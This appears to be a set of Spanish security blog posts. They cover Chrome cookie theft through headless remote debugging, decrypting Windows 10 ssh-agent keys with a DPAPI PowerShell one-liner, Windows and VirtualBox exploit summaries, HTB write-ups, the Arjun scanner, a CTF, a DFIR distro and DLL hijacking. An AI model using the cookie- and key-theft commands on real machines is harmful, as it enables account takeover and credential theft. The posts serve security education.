Cookie_crimes en JS + one-liners para robar las cookies de Chrome

Cookie_crimes de @mangopdf es una herramienta capaz de robar las cookies de Chrome de un usuario y, por lo tanto, iniciar sesión en todos los sitios web en los que se haya autenticado.

Funciona lanzando Chrome en modo headless (en consola) y levantándolo en modo de depuración remota, usando el mismo user-data-dir que la víctima (el directorio donde se almacenan contraseñas, historial etc. Por ej.
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome \
--headless \
--user-data-dir="$HOME/Library/Application Support/Google/Chrome/" \
https://gmail.com \
--remote-debugging-port=9222

Esto pondrá a la escucha el debugging remoto en localhost:9222 (el puerto predeterminado para la depuración remota de Chrome) esperando cualquier websocket. Si se ejecuta el comando 'Network.getAllCookies' obtendremos el preciado botín:
wsc ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
Connected to ws://localhost:9222/devtools/page/7404BF41DC4E7512E0431577BABCE18A
>
>{"id": 1, "method": "Network.getAllCookies"}
[{
    "domain": "mail.google.com",
    "expires": -1,
    "httpOnly": false,
    "name": "GMAIL_AT",
    "path": "/mail/u/0",
    "secure": true,
    "session": true,
    "size": 42,
    "value": <unencrypted cookie value appears here>
  },
  ...<the rest of the cookies>

Como veis, Chrome nos da las cookies sin necesidad de la contraseña de Chrome Safe Storage, y sin necesidad de ser root, o conocer la contraseña del usuario.

[HTB old-but-gold write-ups] Brainfuck

Buenas a todos!
Hoy vengo con un write-up de una máquina de HTB retirada y muy antigua pero que creo que merece la pena echarle un ojo por las distintas técnicas que se utilizarán: Brainfuck.


Durante el proceso, aprenderemos acerca de exploiting en Wordpress, mail servers, cifrados Vigenere, bruteforce de claves SSH y técnicas para desencriptar claves RSA.
Vamos con ello!

Extrayendo las claves privadas SSH del ssh-agent de Windows 10

Desde Abril de este año Windows 10 incluye OpenSSH de forma nativa, así que ya no es necesario usar Putty ni las claves con formato PPK. Pero, ¿es seguro cómo Windows almacena las claves privadas SSH?

Pues las claves privadas se almacenan en la sección de registro de HKCU (HKCU\Software\OpenSSH\Agent\Keys) y están protegidas con DPAPI (Data Protection API)... y se puede descifrar simplemente con este one-liner de Atif Aziz:

Add-Type -AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type -raw (Join-Path $env:USERPROFILE foobar))), $null, 'CurrentUser'))

Así que el americano Ronnie Flathers aka @ropnop ha juntado esta información para demostrar que es posible extraer y reconstruir la clave privada RSA del registro y ha publicado el código necesario para llevarlo a cabo. ¡Vamos ha probarlo!

Primero generamos una clave privada en nuestro cliente Windows 10 para posteriormente llevar su par al servidor SSH:


Añadimos la clave privada a nuestro agente ssh:


Ahora obtenemos la clave del registro (base64):


Y finalmente extraemos la clave privada RSA desde el json obtenido:

# python3 extractPrivateKeys.py extracted_keyblobs.json


 Fuente: Extracting SSH Private Keys from Windows 10 ssh-agent

CVE-2018-8589 o una condición de carrera que permite escalar privilegios en Windows

En octubre de 2018, los sistemas de Prevención de Explotación Automática (AEP) de Kaspersky detectaron un intento de explotar una vulnerabilidad en Windows que un análisis posterior confirmó como un nuevo 0-day que afectaba específicamente a win32k.sys. El exploit fue ejecutado por el primer stage de un instalador de malware para obtener los privilegios necesarios para la persistencia en el sistema de la víctima y fue detectado en varios ataques dirigidos en países del Este.

La vulnerabilidad, corregida por Microsoft el pasado martes, fue bautizada como CVE-2018-8589 y permite a un atacante elevar privilegios en un Windows 7 o Windows Server 2008. Se trata de una condición de carrera presente en win32k!XxxMoveWindow debido a un bloqueo incorrecto de los mensajes enviados de forma sincrónica entre threads.

El exploit crea dos threads, uno para una clase y otro para una ventana asociada. Luego mueve la ventana del thread opuesto dentro de la devolución de llamada de un mensaje WM_NCCALCSIZE en un procedimiento de ventana que es común a ambos.

Mensaje WM_NCCALCSIZE en win32k!XxxCalcValidRects

Arjun: herramienta para el descubrimiento de parámetros web

Arjun es una herramienta para python 3.4 o superior que nos ayudará en el descubrimiento de parámetros web. Sus características principales son:
  • Multihilo
  • 3 modos de detección
  • Escaneo heuristico regex
  • Enorme lista de nombres de parámetros (3370) de @SecLists

Descubrimiento de parametros

Para encontrar parámetros GET, puedes simplemente hacer:

python3 arjun.py -u https://api.example.com/endpoint --get

Del mismo modo, usa --post para encontrar parámetros POST.

Multihilo

Arjun usa 2 hilos de forma predeterminada, pero se puede ajustar su rendimiento de acuerdo con la conexión de red.

python3 arjun.py -u https://api.example.com/endpoint --get -t 22

Delay entre peticiones

Se puede ajustar el delay de las peticiones utilizando la opción -d de la siguiente forma:

python3 arjun.py -u https://api.example.com/endpoint --get -d 2

Añadiendo encabezados HTTP

Al usar el parámetro --headers se abrirá un prompt interactivo donde se pueden pegar encabezados HTTP. Ctrl + S para guardar y Ctrl + X para procesar.


Nota: Arjun usa nano como editor predeterminado para el prompt, pero se puede cambiar en /core/prompt.py.

Github: https://github.com/s0md3v/Arjun

[HTB Write-up] Reel

Volvemos con una nueva entrega de write-ups de HTB, en este caso Reel, una máquina Windows con mucha sabrosura y que nos enseñará bastante tela acerca de DA, Powershell y de cómo aprovechar privilegios heredados. ¡Vamos allá!
 
Scanning

Como siempre, empezamos con un SYN scan para descubrir puertos abiertos de la forma más rápida y sigilosa posible. Tras esto, podemos comprobar las versiones y ejecutar scripts NSE seguros.

-sS

Publican un 0-day en VirtualBox que permite escaparse de la máquina virtual y ejecutar código en el host

El investigador ruso Sergey Zelenyuk ha publicado información detallada de un zero-day en VirtualBox 5.2.20 y versiones anteriores que puede permitir a un atacante escapar literalmente de un máquina virtual y ejecutar código en ring 3 en el host. Luego se pueden usar las tradicionales técnicas para escalar privilegios a ring 0 vía /dev/vboxdrv.

Sergey, en total desacuerdo con la respuesta de Oracle en su programa de bug bounty y con el "mercadeo" actual de vulnerabilidades, ha publicado también un video con la PoC que muestra el 0-day en acción contra una máquina virtual de Ubuntu que se ejecuta dentro de VirtualBox en un sistema operativo host también de Ubuntu.


VirtualBox E1000 Guest-to-Host Escape from Sergey Zelenyuk on Vimeo.

La vulnerabilidad es un buffer overflow que se provoca en el proceso de escritura de los descriptores Tx a la tarjeta de red. El único requisito es tener configurado la VM con el adaptador de red Intel PRO/1000 MT Desktop (82540EM) en modo NAT, que es la configuración por defecto que trae VirtualBox. Cualquier SO en la máquina virtual y en el host son vulnerables.

Tenéis el detalle técnico explicado perfectamente en su repositorio de Github:

https://github.com/MorteNoir1/virtualbox_e1000_0day/

Anuncian el CTF 2018 Metasploit Community

La gente de Rapid7 ha anunciado hoy su "Metasploit Community CTF" en el que se pondrán en liza dos objetivos que mil equipos intentarán comprometer durante los tres días que dura la competición.

La inscripción se abre el lunes 12 de noviembre a las 12.00 AM EST (a las 6:00 GMT+1 si no me equivoco) y, como comentamos, hay disponibles hasta 1000 registros; tanto personas individuales como equipos. Si optáis por este último caso tened en cuenta que los equipos solo necesitan registrar UNA única cuenta. Los miembros del equipo pueden y deben compartir las credenciales.

El CTF empezará el viernes 30 de noviembre a las 11:59 AM EST (a las 5:59 GMT+1) hasta el lunes 3 de diciembre a la misma hora.

Cuando comience el juego, los jugadores deben usar las instrucciones disponibles en el Panel de control para conectarse a un equipo de salto con Kali Linux. Desde allí, los jugadores pueden atacar los entornos vulnerables para encontrar las flags. Todas las flags son imágenes PNG, cuando se encuentre una, los jugadores deben enviar el hash MD5 al dashboard. Si el hash MD5 es correcto, se otorgarán puntos. Podéis ver los resultados y las estadísticas del CTF del año pasado aquí.

Los tres participantes con la puntuación total más alta al final recibirán los siguientes premios. En caso de empate, el participante que haya alcanzado ese puntaje primero será el ganador.

PosiciónPremioValor (no reembolsable)
1stHak5 Essentials Field Kit$220 USD
2ndHak5 Network Implant Bundle$150 USD
3rdHak5 WiFi Pineapple (NANO Tactical)$130 USD

Para formar equipos y hablar con otros jugadores podéis uniros al canal #ctf-support-2018 en Metasploit Slack. Tenéis el anuncio del CTF y más información en la página oficial:

https://blog.rapid7.com/2018/11/05/announcing-the-2018-metasploit-community-ctf/

Tsurugi Linux, nueva distro de DFIR

Tsurugi es una nueva distribución Linux bajo licencia GNU diseñada para soportar investigaciones de DFIR, análisis de malware y actividades de inteligencia.
 

En esta distribución se incluyen las últimas versiones de las herramientas más famosas que se necesitan para llevar a cabo una investigación forense o de respuesta a incidentes en profundidad y varias características útiles como el bloqueo de escritura de dispositivos a nivel del kernel, un selector de perfiles OSINT y mucho más.

El sistema se basa en un Ubuntu LTS de 64 bits (Long Time Support) y usan la versión 16.04 para tener un sistema estable con más herramientas compatibles, aunque tienen en su hoja de ruta una actualización a la versión 18.04 LTS para el próximo año. También tienen un repositorio dedicado.

El kernel parcheado se basa en la versión 4.18.5 reciente que implementa muchos controladores y características nuevos. Se puede usar Tsurugi Linux [LAB] en modo live-cd, pero su objetivo principal es instalarse y convertirse en su laboratorio forense

Web: https://tsurugi-linux.org/

DOWNLOAD MIRROR

LAST RELEASES INFORMATION

Tsurugi Linux [64-bit]
Filename: tsurugi_lab_2018.1.iso
sha1: b54895db6fba93239b668edb9f5ef02bef975b40

Tsurugi Acquire [32-bit]
Filename: tsurugi_acquire_2018.1.iso
sha1: f16ad3bc9669efcb22a9859a09598ca12c060d78

Bento portable toolkit
Filename: pronto disponible
sha1: pronto disponible

Robber: una herramienta para buscar ejecutables susceptibles a DLL hijacking

Robber es una herramienta de código abierto desarrollada en Delphi XE2 sin dependencias de terceros que permite buscar los ejecutables del sistema susceptibles a DLL hijacking o secuestro de DLL, una vulnerabilidad ya bastante antigua pero que todavía sigue activa en nuestros días.


Como va vimos en el blog:

"Cuando una aplicación mediante LoadLibrary() o LoadLibraryEx() intenta cargar funciones adicionales enlazando en tiempo real con una librería dinámica y no se especifica su ruta completa, Windows define como primer orden de búsqueda de la DLL el directorio actual del proceso: http://msdn.microsoft.com/en-us/library/ms682586%28v=VS.85%29.aspx.

Si un usuario abre un fichero legítimo mediante una aplicación afectada y en el mismo directorio se encuentra una DLL maliciosa (renombrada como la original), un atacante podría conseguir la ejecución de código arbitrario a través de la carga de esa librería modificada.
"

Si la DLL no se encuentra en el directorio de trabajo de la aplicación o "." (opción A o prioridad más alta, primera comprobación) las rutas de búsqueda siguientes son:

B) \Windows
C) \Windows\system32
D) \Windows\syswow64
  <- prioridad más baja, última comprobación
 
Por ejemplo, si algunos ejecutables "Foo.exe" solicitan "bar.dll" que está el directorio syswow64 (D) esto nos dará una buena oportunidad para colocar una versión maliciosa en A), B) o C) y se cargará en el ejecutable. Incluso una ruta completa absoluta no puede proteger contra esto si se puede reemplazar la DLL con una versión modificada.